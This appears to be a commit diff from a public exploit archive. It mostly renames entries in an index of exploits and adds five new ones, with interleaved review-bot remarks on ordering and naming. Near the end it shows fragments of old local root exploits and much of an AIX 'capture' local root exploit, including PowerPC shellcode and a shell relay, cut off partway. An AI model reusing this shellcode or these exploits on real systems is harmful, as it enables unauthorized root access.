DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
parent 48534c54b0
commit 477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions

files.csv (39 changed lines)
@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
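Review bot: context line 15732 (FontForge, dated 2010-12-14) sits between 12240 and 12241 in this hunk, out of id and date order. It is not introduced by this change, but since the commit already touches this region of files.csv, moving it to its numeric position is a cheap follow-up that keeps the id column monotonic.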
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
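Review bot: the renamed entry 14322 (dated 2010-07-10) sits between 12691 and 12692 (2010-05-21 and 2010-05-22), so it is out of both id and date order. Since this change already rewrites that line, consider moving it to its numeric position in the same commit; the hunk at 12587 below shows 14320 followed directly by 14324, which is where it belongs.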
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
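Review bot: the edit to 34606 is not the "Multiple Vulnerability" to "Multiple Vulnerabilities" normalization every other files.csv hunk in this commit makes; it inserts a version, "Webformatique Reservation Manager 2.4", into the title. Nothing in the diff shows where 2.4 comes from, so either confirm it against 34606.txt or state the source in the commit message, which currently lists the old and new titles without explanation.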
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
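Review bot: the five added lines are not named consistently with the normalization the rest of this commit applies. 39568 keeps an "Exploit" suffix ("Cisco UCS Manager 2.1(1b) - Shellshock Exploit") while 39564, 39565, 39569 and 39570 name only the issue, and the 3671 hunk at the top of this diff drops exactly that suffix ("Multiple Vulnerability Exploit" becomes "Multiple Vulnerabilities"). Since the type column already records remote/dos/webapps, "Cisco UCS Manager 2.1(1b) - Shellshock" would match the convention being introduced.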
@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/netpmon", args, envs );

return( 0 );
}

// milw0rm.com [2005-06-14]
}

// milw0rm.com [2005-06-14]
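Review bot: the three removed lines (`}`, a blank, `// milw0rm.com [2005-06-14]`) and the three added lines are byte-identical as rendered, so this hunk changes only whitespace or line endings. Confirm that this is intended (trailing-newline or CRLF normalization) rather than editor noise, because the same pattern repeats in every code hunk below and the header reports 7877 changed files, which makes unintended rewrites hard to spot in review.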
@ -95,6 +95,6 @@ int main()
execve( "/usr/sbin/ipl_varyon", args, envs );

return( 0 );
}

// milw0rm.com [2005-06-14]
}

// milw0rm.com [2005-06-14]
@ -94,6 +94,6 @@ int main()
execve( "/usr/bin/paginit", args, envs );

return( 0 );
}

// milw0rm.com [2005-06-14]
}

// milw0rm.com [2005-06-14]
@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L
done
/str0ke
*/

// milw0rm.com [1997-05-27]
*/

// milw0rm.com [1997-05-27]
@ -156,6 +156,6 @@ do
echo $L
L=`expr $L + 42`
./a.out $L
done */

// milw0rm.com [1997-05-26]
done */

// milw0rm.com [1997-05-26]
@ -1,178 +1,178 @@
|
|||
/* 07/2007: public release
|
||||
* IBM AIX <= 5.3 sp6
|
||||
*
|
||||
* AIX capture Local Root Exploit
|
||||
* By qaaz
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/select.h>
|
||||
|
||||
#define TARGET "/usr/bin/capture"
|
||||
#define VALCNT 40
|
||||
|
||||
#define MAX(x,y) ((x) > (y) ? (x) : (y))
|
||||
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
|
||||
|
||||
unsigned char qaazcode[] =
|
||||
"\x60\x60\x60\x60\x60\x60\x60\x60"
|
||||
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
|
||||
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
|
||||
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
|
||||
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
|
||||
"\x44\xff\xff\x02\x38\x75\xff\x5f"
|
||||
"\x38\x63\x01\x01\x88\x95\xff\x5d"
|
||||
"\x38\x63\x01\x02\x38\x63\xfe\xff"
|
||||
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
|
||||
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
|
||||
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
|
||||
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
|
||||
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
|
||||
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
|
||||
|
||||
void shell(int p1[2], int p2[2])
|
||||
{
|
||||
ssize_t n;
|
||||
fd_set rset;
|
||||
char buf[4096];
|
||||
|
||||
for (;;) {
|
||||
FD_ZERO(&rset);
|
||||
FD_SET(p1[0], &rset);
|
||||
FD_SET(p2[0], &rset);
|
||||
|
||||
n = select(MAX(p1[0], p2[0]) + 1,
|
||||
&rset, NULL, NULL, NULL);
|
||||
if (n < 0) {
|
||||
perror("[-] select");
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(p1[0], &rset)) {
|
||||
n = read(p1[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p1[1], buf, n);
|
||||
}
|
||||
if (FD_ISSET(p2[0], &rset)) {
|
||||
n = read(p2[0], buf, sizeof(buf));
|
||||
if (n <= 0) break;
|
||||
write(p2[1], buf, n);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* just because you don't understand it doesn't mean it has to be wrong */
